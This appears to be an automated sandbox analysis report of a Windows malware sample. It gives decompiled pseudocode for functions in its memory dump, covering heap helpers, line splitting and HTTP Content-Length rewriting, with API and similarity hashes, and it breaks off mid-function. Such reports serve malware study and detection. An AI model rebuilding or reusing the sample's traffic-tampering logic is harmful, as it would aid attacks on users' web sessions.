0x004176e5
0x004176e6
0x004176ec
0x00000000
0x00000000
0x004176f4
0x004176f6
0x004176fa
0x004176fa
0x00417700
0x00417740
0x00417787
0x00417787
0x00417790
0x00417790
0x00417793
0x0041779e
0x00000000
0x00000000
0x004177a4
0x004177ab
0x004177ad
0x004177af
0x004177af
0x004177af
0x004177b5
0x004177b7
0x004177b7
0x004177c3
0x004177c5
0x004177ca
0x00417812
0x00417823
0x00417827
0x00000000
0x00000000
0x00000000
0x00000000
0x004177ca
0x004177e0
0x004177e0
0x004177e2
0x004177e7
0x004177eb
0x00000000
0x004177eb
0x00417746
0x00417748
0x0041774a
0x0041774a
0x0041774a
0x00417750
0x00417752
0x00417752
0x00417763
0x00000000
0x00417765
0x00417765
0x0041776a
0x00417780
0x00000000
0x00000000
0x00000000
0x00000000
0x0041776a
0x00417763
0x00417705
0x00417715
0x00417722
0x00417727
0x0041772d
0x00417733
0x00417733
0x0041772d
0x00000000
0x00417705
0x004176c4

APIs

StrCmpNIA.SHLWAPI(00000001,script,00000006,-00000008,00000000,?,?,?,?,00000000,00000000,00000000), ref: 0041775B
StrCmpNIA.SHLWAPI(00000001,nbsp;,00000005,-00000008,00000000,?,?,?,?,00000000,00000000,00000000), ref: 00417858

Strings

nbsp;, xrefs: 0041784E
script, xrefs: 0041771D, 00417755

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: nbsp;$script
API String ID: 0-298180595
Opcode ID: e2aa87e31974b533fe62e56d96ebe3bf90485a6725c60df0017fbdb58cdd042e
Instruction ID: 1fce67ff949d7af4406b649d5b29bfcaff8bda0dbe5d1ac9be00ebf5a0302670
Opcode Fuzzy Hash: e2aa87e31974b533fe62e56d96ebe3bf90485a6725c60df0017fbdb58cdd042e
Instruction Fuzzy Hash: 1A51F07064C3869ACB319E18C4446EBBBF2AB52344F58095BE4E053391D72DE9CAC76E

Uniqueness

Uniqueness Score: -1.00%

Function 00411430, Relevance: 7.7, APIs: 6, Instructions: 171
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00411430(void* __eax, signed int _a4, void* _a8, signed char _a12, intOrPtr _a16) {
				signed int _v4;
				void* __edi;
				signed int _t45;
				char* _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				void _t54;
				intOrPtr* _t55;
				signed int _t59;
				void* _t61;
				void* _t64;
				char _t66;
				signed int _t68;
				long _t69;
				void* _t70;
				signed int _t73;
				char* _t77;
				void** _t78;
				signed int _t85;
				intOrPtr* _t88;
				long _t89;
				char* _t90;

				_t90 = _a4;
				_t64 = __eax + _t90;
				_a4 = 0;
				 *_a8 = 0;
				if(_t90 >= _t64) {
					L47:
					return _a4;
				} else {
					_t45 = _a12 & 0x00000002;
					_v4 = _t45;
					while(1) {
						_t88 = _t90;
						_t46 = _t90;
						if(_t45 == 0) {
							goto L7;
						} else {
						}
						while( *_t46 != _a16) {
							_t46 = _t46 + 1;
							if(_t46 < _t64) {
								continue;
							}
							break;
						}
						_t85 = _t46 - _t90;
						L15:
						_t78 = _a8;
						_t10 = _t46 + 1; // 0x74b05522
						_t90 = _t10;
						_t48 = 8 + _a4 * 4;
						_t14 = _t48 - 4; // -4
						_t69 = _t14;
						if(_t69 != 0) {
							_t70 =  *_t78;
							_push(_t48);
							if(_t70 != 0) {
								_t49 = HeapReAlloc( *0x42e6d4, 8, _t70, ??);
							} else {
								_t49 = HeapAlloc( *0x42e6d4, 8, ??);
							}
							if(_t49 == 0) {
								goto L40;
							} else {
								 *_a8 = _t49;
								goto L24;
							}
						} else {
							_t61 =  *_t78;
							if(_t61 != 0) {
								HeapFree( *0x42e6d4, _t69, _t61);
							}
							 *_a8 = 0;
							L24:
							if(_t85 == 0) {
								L35:
								if((_a12 & 0x00000001) != 0) {
									_t54 =  *_a8;
									_t73 = _a4;
									_t55 = _t54 + _t73 * 4;
									if( *((intOrPtr*)(_t54 + _t73 * 4)) != 0) {
										E00410EC0( *_t55);
									}
								}
								_a4 = _a4 + 1;
								if(_t90 >= _t64) {
									goto L47;
								} else {
									_t45 = _v4;
									continue;
								}
							} else {
								if(_t88 != 0) {
									if(_t85 == 0xffffffff) {
										_t59 = 0;
										if( *_t88 != 0) {
											do {
												_t59 = _t59 + 1;
											} while ( *((char*)(_t59 + _t88)) != 0);
										}
										_t85 = _t59;
									}
									_t18 = _t85 + 1; // 0x1
									_t49 = _t18;
									if(_t49 != 0) {
										_t49 = HeapAlloc( *0x42e6d4, 8, _t49 + 4);
										if(_t49 != 0) {
											_t49 = E00410820(_t49, _t88, _t85);
										}
									}
								} else {
									_t49 = 0;
								}
								 *( *_a8 + _a4 * 4) = _t49;
								if(_t49 == 0) {
									L40:
									_t89 = _a4;
									if(_t89 != 0) {
										do {
											_t51 =  *(_a8 + _t89 * 4 - 4);
											_t89 = _t89 - 1;
											if(_t51 != 0) {
												HeapFree( *0x42e6d4, 0, _t51);
											}
										} while (_t89 != 0);
										_t49 = HeapFree( *0x42e6d4, _t89, _a8);
									}
									return _t49 | 0xffffffff;
								} else {
									goto L35;
								}
							}
						}
						goto L48;
						while(1) {
							L7:
							_t66 =  *_t46;
							if(_t66 == 0xa || _t66 == 0xd) {
								break;
							}
							_t46 = _t46 + 1;
							if(_t46 < _t64) {
								continue;
							}
							break;
						}
						_t8 = _t46 + 1; // 0x74b05522
						_t77 = _t8;
						_t68 = _t46 - _t90;
						if(_t77 < _t64 &&  *_t46 == 0xd &&  *_t77 == 0xa) {
							_t46 = _t77;
						}
						_t85 = _t68;
						goto L15;
					}
				}
				L48:
			}

0x00411437
0x0041143b
0x00411440
0x00411448
0x00411450
0x004115ee
0x004115f7
0x00411456
0x0041145a
0x0041145d
0x00411461
0x00411463
0x00411465
0x00411467
0x00000000
0x00000000
0x00000000
0x00411470
0x00411478
0x0041147b
0x00000000
0x00000000
0x00000000
0x0041147b
0x0041147f
0x004114ad
0x004114ad
0x004114b1
0x004114b1
0x004114b8
0x004114bf
0x004114bf
0x004114c4
0x004114e6
0x004114e8
0x004114eb
0x00411507
0x004114ed
0x004114f5
0x004114f5
0x0041150f
0x00000000
0x00411515
0x00411519
0x00000000
0x00411519
0x004114c6
0x004114c6
0x004114ca
0x004114d4
0x004114d4
0x004114de
0x0041151b
0x0041151d
0x00411571
0x00411576
0x0041157c
0x0041157e
0x00411586
0x00411589
0x0041158d
0x0041158d
0x00411589
0x00411592
0x00411598
0x00000000
0x0041159a
0x0041159a
0x00000000
0x0041159a
0x0041151f
0x00411521
0x0041152a
0x0041152c
0x00411530
0x00411532
0x00411532
0x00411533
0x00411532
0x00411539
0x00411539
0x0041153b
0x0041153b
0x00411540
0x0041154e
0x00411556
0x0041155b
0x0041155b
0x00411556
0x00411523
0x00411523
0x00411523
0x0041156a
0x0041156f
0x004115a3
0x004115a3
0x004115a9
0x004115b0
0x004115b4
0x004115b8
0x004115bb
0x004115c6
0x004115c6
0x004115cc
0x004115dd
0x004115dd
0x004115eb
0x00000000
0x00000000
0x00000000
0x0041156f
0x0041151d
0x00000000
0x00411483
0x00411483
0x00411483
0x00411488
0x00000000
0x00000000
0x0041148f
0x00411492
0x00000000
0x00000000
0x00000000
0x00411492
0x00411496
0x00411496
0x00411499
0x0041149d
0x004114a9
0x004114a9
0x004114ab
0x00000000
0x004114ab
0x00411461
0x00000000

APIs

HeapFree.KERNEL32(?,-00000004,00000000), ref: 004114D4
HeapAlloc.KERNEL32(?,00000008,00000000,?,00000000,?,00000023,?,00424D37,?,?,00000002,00000026), ref: 004114F5
HeapReAlloc.KERNEL32(?,00000008,-00000004,00000000,?,00000000,?,00000023,?,00424D37,?,?,00000002,00000026), ref: 00411507
HeapAlloc.KERNEL32(?,00000008,74B0551E), ref: 0041154E
HeapFree.KERNEL32(?,00000000,?), ref: 004115C6
HeapFree.KERNEL32(?,-00000001,?), ref: 004115DD

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocFree
String ID:
API String ID: 1379380650-0
Opcode ID: 7b618fbe25802d08a5fa4d2b253703fe6fabaca9aad1c1cc6cc6eea17163648a
Instruction ID: 40173d6a1d742a4caed00c022c0c96b4085e151d9f4ba36f6cb5989bc4053545
Opcode Fuzzy Hash: 7b618fbe25802d08a5fa4d2b253703fe6fabaca9aad1c1cc6cc6eea17163648a
Instruction Fuzzy Hash: 3951F6717042029FD724CF24D884BABB7E6AB95350F54052EE642CB371DB38DC85C799

Uniqueness

Uniqueness Score: -1.00%

Function 00413860, Relevance: 7.7, APIs: 6, Instructions: 166
memoryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E00413860(signed int* __esi) {
				void* _t60;
				void* _t63;
				void* _t66;
				void* _t68;
				void* _t70;
				void* _t73;
				void* _t75;
				signed int _t78;
				signed int _t82;
				signed int _t84;
				signed int _t86;
				signed int _t92;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				signed int _t109;
				signed int* _t114;

				_t114 = __esi;
				_t60 =  *__esi + 0x1000;
				__esi[0x12] = 0;
				__esi[0x13] = 0;
				__esi[0x14] = 0;
				__esi[0x15] = 0;
				__esi[0x16] = 0;
				__esi[0x17] = 0;
				if(_t60 != 0) {
					_t63 = HeapAlloc( *0x42e6d4, 8, _t60 + 4);
				} else {
					_t63 = 0;
				}
				_t114[0x12] = _t63;
				_t114[0x13] = HeapAlloc( *0x42e6d4, 8, 0x40004);
				_t66 = 0x2000 +  *_t114 * 4;
				if(_t66 != 0) {
					_t68 = HeapAlloc( *0x42e6d4, 8, _t66 + 4);
				} else {
					_t68 = 0;
				}
				_t114[0x14] = _t68;
				_t70 = 0x2000 +  *_t114 * 4;
				if(_t70 != 0) {
					_t73 = HeapAlloc( *0x42e6d4, 8, _t70 + 4);
				} else {
					_t73 = 0;
				}
				_t114[0x15] = _t73;
				_t114[0x16] = HeapAlloc( *0x42e6d4, 8, 0x40004);
				_t75 = HeapAlloc( *0x42e6d4, 8, 0x40004);
				_t109 = _t114[0x12];
				_t114[0x17] = _t75;
				if(_t109 == 0 || _t114[0x13] == 0 || _t114[0x14] == 0 || _t114[0x15] == 0) {
					L29:
					return 3;
				} else {
					_t100 = _t114[0x16];
					if(_t114[0x16] == 0 || _t75 == 0) {
						goto L29;
					} else {
						_t103 =  *_t114;
						_t114[1] = 0x800;
						_t114[2] = 0x800;
						_t78 = _t103 + 0x800;
						_t114[0xe] = _t78;
						if(_t78 + 0x800 < 0xffffffff) {
							_t114[0xf] = _t109 + _t78;
							_t114[0x10] = _t103;
							E00410870(_t78, _t100, 0, 0x40000);
							E00410870(_t114[0x17], _t114[0x17], 0xffffffff, 0x40000);
							_t82 = _t114[7];
							_t104 =  *((intOrPtr*)(_t82 + 0x1c));
							_t84 =  *((intOrPtr*)(_t82 + 0x24)) -  *((intOrPtr*)(_t82 + 0x1c));
							_t114[0xb] = 0;
							_t114[9] = 0;
							_t114[0xa] = 0;
							_t114[0xc] = 0;
							_t114[0x11] = 0;
							_t114[5] = _t84;
							if(_t84 != 0) {
								if(_t84 > 0x800) {
									_t114[5] = 0x800;
								}
								E00410820(_t114[0x12], _t104, _t114[5]);
								_t106 = _t114[5];
								 *((intOrPtr*)(_t114[7] + 0x1c)) =  *((intOrPtr*)(_t114[7] + 0x1c)) + _t106;
								_t114[0xb] = _t114[0xb] + _t106;
							}
							if(_t114[0xb] == _t114[0xe]) {
								_t114[0xb] = 0;
							}
							if(_t114[5] >= 2) {
								_t92 = _t114[0xa];
								if(_t92 > 0) {
									_push(_t92);
									E004137B0(_t114);
								}
							}
							_t86 = _t114[0x11];
							_t105 = _t114[0x10];
							_t114[0xd] = _t86;
							if(_t86 < _t105) {
								_t114[0xd] = _t86 - _t105 + _t114[0xe];
								return 0;
							} else {
								_t114[0xd] = _t86 - _t105;
								return 0;
							}
						} else {
							return 1;
						}
					}
				}
			}

0x00413860
0x0041386c
0x00413871
0x00413874
0x00413877
0x0041387a
0x0041387d
0x00413880
0x00413883
0x00413895
0x00413885
0x00413885
0x00413885
0x004138a5
0x004138aa
0x004138af
0x004138b8
0x004138cb
0x004138ba
0x004138ba
0x004138ba
0x004138cd
0x004138d2
0x004138db
0x004138ed
0x004138dd
0x004138dd
0x004138dd
0x004138fd
0x00413910
0x00413913
0x00413915
0x00413918
0x0041391d
0x00413a2e
0x00413a34
0x0041393e
0x0041393e
0x00413943
0x00000000
0x00413951
0x00413951
0x00413958
0x0041395b
0x0041395e
0x0041396e
0x00413972
0x00413985
0x00413988
0x0041398b
0x0041399b
0x004139a0
0x004139a3
0x004139a9
0x004139ab
0x004139ae
0x004139b1
0x004139b4
0x004139b7
0x004139ba
0x004139bd
0x004139c4
0x004139c6
0x004139c6
0x004139d6
0x004139db
0x004139e1
0x004139e6
0x004139e6
0x004139ef
0x004139f1
0x004139f1
0x004139f8
0x004139fa
0x004139ff
0x00413a01
0x00413a04
0x00413a04
0x004139ff
0x00413a09
0x00413a0c
0x00413a0f
0x00413a14
0x00413a26
0x00413a2c
0x00413a16
0x00413a19
0x00413a1f
0x00413a1f
0x00413975
0x0041397b
0x0041397b
0x00413972
0x00413943

APIs

HeapAlloc.KERNEL32(?,00000008,-00001004,?,00000000,0041446B), ref: 00413895
HeapAlloc.KERNEL32(?,00000008,00040004), ref: 004138A8
HeapAlloc.KERNEL32(?,00000008,-00000004), ref: 004138CB
HeapAlloc.KERNEL32(?,00000008,-00000004), ref: 004138ED
HeapAlloc.KERNEL32(?,00000008,00040004), ref: 00413900
HeapAlloc.KERNEL32(?,00000008,00040004), ref: 00413913

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: bf33fe18a9401a47536c5ddb2f760b751d91835a1b35a0426ef8c13718ac60ba
Instruction ID: fe1889f02a0941dc290db51465094c4ecc9f8dcee98c3e512a43076f146f97b6
Opcode Fuzzy Hash: bf33fe18a9401a47536c5ddb2f760b751d91835a1b35a0426ef8c13718ac60ba
Instruction Fuzzy Hash: 0B5135B0A00B008FC330DF6AD980A57F7E5BF98715B50492EE186C7A60D675F9858F58

Uniqueness

Uniqueness Score: -1.00%

Function 00411600, Relevance: 7.6, APIs: 6, Instructions: 149
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00411600(signed int __eax, signed int _a4) {
				signed short* _v4;
				void* __edi;
				signed short* _t34;
				void* _t36;
				signed int _t37;
				void* _t39;
				void _t42;
				intOrPtr* _t43;
				signed int _t45;
				void* _t48;
				signed short* _t50;
				signed short* _t51;
				signed int _t52;
				signed short* _t53;
				long _t54;
				void* _t55;
				signed int _t57;
				signed short* _t59;
				signed int _t66;
				signed short* _t69;
				long _t70;
				void* _t71;

				_t71 = _a4;
				_t69 = _t51;
				_t59 =  &(_t69[__eax]);
				_v4 = _t59;
				_a4 = 0;
				 *_t71 = 0;
				if(_t69 >= _t59) {
					L32:
					return _a4;
				} else {
					do {
						_t50 = _t69;
						_t34 = _t69;
						while(1) {
							_t52 =  *_t34 & 0x0000ffff;
							if(_t52 == 0xa || _t52 == 0xd) {
								break;
							}
							_t34 =  &(_t34[1]);
							if(_t34 < _t59) {
								continue;
							}
							break;
						}
						_t6 =  &(_t34[1]); // 0x0
						_t53 = _t6;
						_t66 = _t34 - _t69 >> 1;
						if(_t53 < _t59 &&  *_t34 == 0xd &&  *_t53 == 0xa) {
							_t34 = _t53;
						}
						_t7 =  &(_t34[1]); // 0x4
						_t69 = _t7;
						_t36 = 8 + _a4 * 4;
						_t11 = _t36 - 4; // -4
						_t54 = _t11;
						if(_t54 != 0) {
							_t55 =  *_t71;
							_push(_t36);
							if(_t55 != 0) {
								_t37 = HeapReAlloc( *0x42e6d4, 8, _t55, ??);
							} else {
								_t37 = HeapAlloc( *0x42e6d4, 8, ??);
							}
							if(_t37 == 0) {
								goto L33;
							} else {
								 *_t71 = _t37;
								goto L19;
							}
						} else {
							_t48 =  *_t71;
							if(_t48 != 0) {
								HeapFree( *0x42e6d4, _t54, _t48);
							}
							 *_t71 = 0;
							L19:
							if(_t66 == 0) {
								goto L29;
							} else {
								_t45 = _t66;
								if(_t50 != 0) {
									if(_t66 == 0xffffffff) {
										_t45 = 0;
										if( *_t50 != 0) {
											do {
												_t45 = _t45 + 1;
											} while (_t50[_t45] != 0);
										}
									}
									_t15 = _t45 + _t45 + 2; // 0x2
									_t37 = _t15;
									if(_t37 != 0) {
										_t37 = HeapAlloc( *0x42e6d4, 8, _t37 + 4);
										if(_t37 != 0) {
											_t37 = E00410820(_t37, _t50, _t68);
										}
									}
								} else {
									_t37 = 0;
								}
								 *( *_t71 + _a4 * 4) = _t37;
								if(_t37 == 0) {
									L33:
									_t70 = _a4;
									if(_t70 != 0) {
										do {
											_t39 =  *(_t71 + _t70 * 4 - 4);
											_t70 = _t70 - 1;
											if(_t39 != 0) {
												HeapFree( *0x42e6d4, 0, _t39);
											}
										} while (_t70 != 0);
										_t37 = HeapFree( *0x42e6d4, _t70, _t71);
									}
									return _t37 | 0xffffffff;
								} else {
									goto L29;
								}
							}
						}
						goto L40;
						L29:
						_t42 =  *_t71;
						_t57 = _a4;
						_t43 = _t42 + _t57 * 4;
						if( *((intOrPtr*)(_t42 + _t57 * 4)) != 0) {
							E00410F50( *_t43);
						}
						_t59 = _v4;
						_a4 = _a4 + 1;
					} while (_t69 < _t59);
					goto L32;
				}
				L40:
			}

0x00411603
0x00411608
0x0041160a
0x0041160e
0x00411612
0x0041161a
0x00411623
0x0041174a
0x00411753
0x00411630
0x00411630
0x00411630
0x00411632
0x00411634
0x00411634
0x0041163a
0x00000000
0x00000000
0x00411641
0x00411646
0x00000000
0x00000000
0x00000000
0x00411646
0x0041164c
0x0041164c
0x0041164f
0x00411653
0x00411661
0x00411661
0x00411663
0x00411663
0x0041166a
0x00411671
0x00411671
0x00411676
0x00411697
0x0041169a
0x0041169d
0x004116b9
0x0041169f
0x004116a7
0x004116a7
0x004116c1
0x00000000
0x004116c7
0x004116c7
0x00000000
0x004116c7
0x00411678
0x00411678
0x0041167d
0x00411688
0x00411688
0x0041168e
0x004116ca
0x004116cc
0x00000000
0x004116ce
0x004116ce
0x004116d2
0x004116db
0x004116dd
0x004116e2
0x004116e4
0x004116e4
0x004116e5
0x004116e4
0x004116e2
0x004116ef
0x004116ef
0x004116f4
0x00411703
0x0041170b
0x00411710
0x00411710
0x0041170b
0x004116d4
0x004116d4
0x004116d4
0x0041171c
0x00411721
0x00411756
0x00411756
0x0041175c
0x00411760
0x00411760
0x00411764
0x00411767
0x00411773
0x00411773
0x00411779
0x00411785
0x00411785
0x00411793
0x00000000
0x00000000
0x00000000
0x00411721
0x004116cc
0x00000000
0x00411723
0x00411723
0x00411726
0x0041172e
0x00411731
0x00411735
0x00411735
0x0041173a
0x0041173e
0x00411742
0x00000000
0x00411630
0x00000000

APIs

HeapFree.KERNEL32(?,-00000004,00000000,?,00000000), ref: 00411688
HeapAlloc.KERNEL32(?,00000008,00000000,?,00000000), ref: 004116A7
HeapReAlloc.KERNEL32(?,00000008,-00000004,00000000,?,00000000), ref: 004116B9
HeapAlloc.KERNEL32(?,00000008,-00000002), ref: 00411703
HeapFree.KERNEL32(?,00000000,?), ref: 00411773
HeapFree.KERNEL32(?,-00000001,00000000), ref: 00411785

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocFree
String ID:
API String ID: 1379380650-0
Opcode ID: 98c4ba5c101567b861ee95d750b0499579127f21eedba7f10aeb34e2f366c013
Instruction ID: cfaddb5f366dec57997c2db34b8c7b3ad154c5ba29b699f22c439990f1092b7e
Opcode Fuzzy Hash: 98c4ba5c101567b861ee95d750b0499579127f21eedba7f10aeb34e2f366c013
Instruction Fuzzy Hash: 4651B3713002019BDB28DF15DC84BAB73A9EBA5310F58452AEA11CB3B0DB75DC85CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00407EF0, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 144
memoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407EF0(void* __eax) {
				void* _t25;
				signed int _t34;
				long _t38;
				void* _t40;
				long _t43;
				void* _t53;
				char* _t56;
				intOrPtr* _t57;
				void* _t70;
				char _t71;
				void* _t74;
				void* _t75;
				intOrPtr _t76;
				void* _t80;
				signed int _t84;
				void* _t86;
				void* _t87;
				void* _t88;
				char* _t90;
				signed int _t91;
				void* _t95;

				_t84 =  *(_t95 + 0x24);
				_t53 = __eax;
				_t25 = __eax + _t84;
				if(_t25 == 0) {
					L2:
					return 0;
				} else {
					_t80 = HeapAlloc( *0x42e6d4, 8, _t25 + 4);
					if(_t80 != 0) {
						_t90 = _t95 + 0x14;
						_t56 = _t90;
						do {
							_t34 = (0x66666667 * _t84 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t84 >> 0x20 >> 2);
							 *((intOrPtr*)(_t95 + 0x10)) = _t34 + _t34 * 4 + _t34 + _t34 * 4;
							_t70 = _t84 -  *((intOrPtr*)(_t95 + 0x10));
							_t84 = _t34;
							if(_t70 <= 9) {
								_t71 = _t70 + 0x30;
							} else {
								_t71 = _t70 + 0x37;
							}
							 *_t56 = _t71;
							_t56 = _t56 + 1;
						} while (_t84 > 0);
						_t86 = _t56 - _t95 + 0x14;
						 *_t56 = 0;
						_t57 = _t56 - 1;
						do {
							 *_t57 =  *_t90;
							 *_t90 =  *_t57;
							_t57 = _t57 - 1;
							_t90 = _t90 + 1;
						} while (_t90 < _t57);
						_t91 =  *(_t95 + 0x24);
						_push(_t95 + 0x24);
						_push("Content-Length");
						_push(_t53);
						_push(_t91);
						_t38 = E00417950();
						if(_t38 != 0) {
							_t74 = _t38 - _t91;
							E00410820(_t80, _t91, _t74);
							_t40 = E00410820(_t80 + _t74, _t95 + 0x18, _t86);
							_t87 = _t86 + _t74;
							_t75 = _t53 - _t74 -  *(_t95 + 0x24);
							E00410820(_t80 + _t87,  *(_t95 + 0x24) + _t40, _t75);
							_push(_t95 + 0x24);
							_push(3);
							_t88 = _t87 + _t75;
							_push(_t88);
							_push(_t80);
							_t43 = E00417950();
							if(_t43 != 0) {
								_t76 =  *((intOrPtr*)(_t95 + 0x2c));
								E00410820(_t43,  *((intOrPtr*)(_t95 + 0x28)), _t76);
								 *( *(_t95 + 0x30)) = _t80;
								return _t88 -  *((intOrPtr*)(_t95 + 0x20)) + _t76;
							} else {
								HeapFree( *0x42e6d4, _t43, _t80);
								return 0;
							}
						} else {
							HeapFree( *0x42e6d4, _t38, _t80);
							return 0;
						}
					} else {
						goto L2;
					}
				}
			}

0x00407ef5
0x00407ef9
0x00407efb
0x00407f01
0x00407f1b
0x00407f23
0x00407f03
0x00407f15
0x00407f19
0x00407f27
0x00407f2b
0x00407f30
0x00407f3f
0x00407f46
0x00407f4c
0x00407f50
0x00407f55
0x00407f5c
0x00407f57
0x00407f57
0x00407f57
0x00407f5f
0x00407f61
0x00407f62
0x00407f6c
0x00407f6e
0x00407f71
0x00407f72
0x00407f77
0x00407f79
0x00407f7c
0x00407f7d
0x00407f7e
0x00407f82
0x00407f8a
0x00407f8b
0x00407f90
0x00407f91
0x00407f92
0x00407f99
0x00407fb8
0x00407fbd
0x00407fcc
0x00407fd9
0x00407fdb
0x00407fe5
0x00407fee
0x00407fef
0x00407ff1
0x00407ff3
0x00407ff4
0x00407ff5
0x00407ffc
0x00408019
0x00408024
0x0040802d
0x0040803e
0x00407ffe
0x00408007
0x00408016
0x00408016
0x00407f9b
0x00407fa4
0x00407fb3
0x00407fb3
0x00000000
0x00000000
0x00000000
0x00407f19

APIs

HeapAlloc.KERNEL32(?,00000008,?,?,?,00000000,?), ref: 00407F0F
HeapFree.KERNEL32(?,00000000,00000000,?,?,Content-Length,?,?,?,?,00000000,?), ref: 00407FA4

Part of subcall function 00417950: StrCmpNIA.SHLWAPI(?,?,00000000,00000000,?,?,?,?,00000000,004086C5,?,?,?), ref: 004179EE

HeapFree.KERNEL32(?,00000000,00000000,00000000,?,00000003,00000000,00000000,00000000,?,?,?,?,00000000,?,00000000), ref: 00408007

Strings

gfff, xrefs: 00407F30
Content-Length, xrefs: 00407F8B

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$Alloc
String ID: Content-Length$gfff
API String ID: 3901518246-3327608114
Opcode ID: f5c5019c0852d1294a8faa2dca426f39ff807579cd43706ad30c50d36291e235
Instruction ID: 7fb144fba8059f8bd18c5d1decb182e72817b58b3552d0a799f09638c7f398b1
Opcode Fuzzy Hash: f5c5019c0852d1294a8faa2dca426f39ff807579cd43706ad30c50d36291e235
Instruction Fuzzy Hash: F94132766082055FD304DB2ADC40EAB37A8EBC9314F044A3EF944D7342EA35ED0A86A2

Uniqueness

Uniqueness Score: -1.00%

Function 0040D620, Relevance: 7.6, APIs: 5, Instructions: 136
synchronizationmemoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040D620(void* __eax, void* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v14;
				void* _v356;
				char _v492;
				intOrPtr _v504;
				void* _v520;
				char _v521;
				void* _v524;
				void* _v533;
				void* _v536;
				void* __edi;
				void* __esi;
				signed char _t42;
				intOrPtr _t44;
				intOrPtr* _t49;
				long _t64;
				void* _t69;
				void* _t72;
				void* _t74;
				intOrPtr _t79;
				void* _t90;
				signed int _t99;
				void* _t101;

				_t101 = (_t99 & 0xfffffff8) - 0x20c;
				_t72 = __eax;
				_t42 = 0;
				_v521 = 0;
				_v520 = 0;
				if(__eax >= 0xa00000) {
					L20:
					return _t42;
				}
				E0040C730(__edx,  &_v520, 0x1e);
				if(0 == 0) {
					L19:
					_t42 = _v521;
					goto L20;
				}
				_t90 = _v520;
				_t44 =  *((intOrPtr*)(_t90 + 0x14));
				_t75 = _t44 + 0x14;
				if(_t44 + 0x14 <= _t44) {
					L17:
					if(_t90 != 0) {
						HeapFree( *0x42e6d4, 0, _t90);
					}
					goto L19;
				}
				E00410740(_t75,  &_v520);
				if(0 == 0) {
					L16:
					_t90 = _v520;
					goto L17;
				}
				_t90 = _v520;
				 *((intOrPtr*)( *((intOrPtr*)(_t90 + 0x14)) + _t90 + 8)) = 4;
				_t49 = E00410820( *((intOrPtr*)(_t90 + 0x14)) + _t90 + 0x10,  &_a4, 4);
				_t96 =  *((intOrPtr*)(_t90 + 0x14));
				_t79 =  *((intOrPtr*)(_t49 + 8)) +  *((intOrPtr*)(_t90 + 0x14)) + 0x10;
				if(_t79 > 0xa00000) {
					goto L17;
				}
				 *((intOrPtr*)(_t49 + 0xc)) = 4;
				_t84 = _a16;
				 *_t49 = 0x2722;
				 *((intOrPtr*)(_t49 + 4)) = 0x20000;
				 *((intOrPtr*)(_t90 + 0x1c)) =  *((intOrPtr*)(_t90 + 0x1c)) + 1;
				 *((intOrPtr*)(_t90 + 0x14)) = _t79;
				E00418930( &_v520, 0x2723, 0x20000, _a16, _t72);
				if(0 == 0) {
					goto L16;
				}
				_t52 = _a8;
				if(_a8 == 0) {
					L8:
					_t53 = _a12;
					if(_a12 == 0) {
						L10:
						_t74 = E0041CDD0(_t111, 0x8793aef2, 2);
						if(_t74 == 0) {
							goto L16;
						} else {
							E0041D1B0( &_v492);
							E0040C490(0, _t96, 1);
							_v504 = _v14;
							if(E00419110(0x42d4f8,  &_v520) == 0) {
								_t90 = _v520;
								ReleaseMutex(_t74);
								CloseHandle(_t74);
							} else {
								_t64 = E00418D30( &_v520, 0, _t101 + 0xbc);
								_t90 =  *(_t101 + 0x14);
								if(_t64 != 0) {
									 *((char*)(_t101 + 0x13)) = E004192B0(_t101 + 0x20, _t90, _t64);
								}
								E00419280(_t101 + 0x18);
								ReleaseMutex(_t74);
								CloseHandle(_t74);
							}
							goto L17;
						}
					}
					_t69 = E004189F0(_t53,  &_v520,  &_v520, 0x2718);
					_t111 = _t69;
					if(_t69 == 0) {
						goto L16;
					}
					goto L10;
				}
				E004189F0(_t52, _t84,  &_v520, 0x2717);
				if(0 == 0) {
					goto L16;
				}
				goto L8;
			}

0x0040d626
0x0040d62d
0x0040d62f
0x0040d633
0x0040d637
0x0040d645
0x0040d7e1
0x0040d7e7
0x0040d7e7
0x0040d651
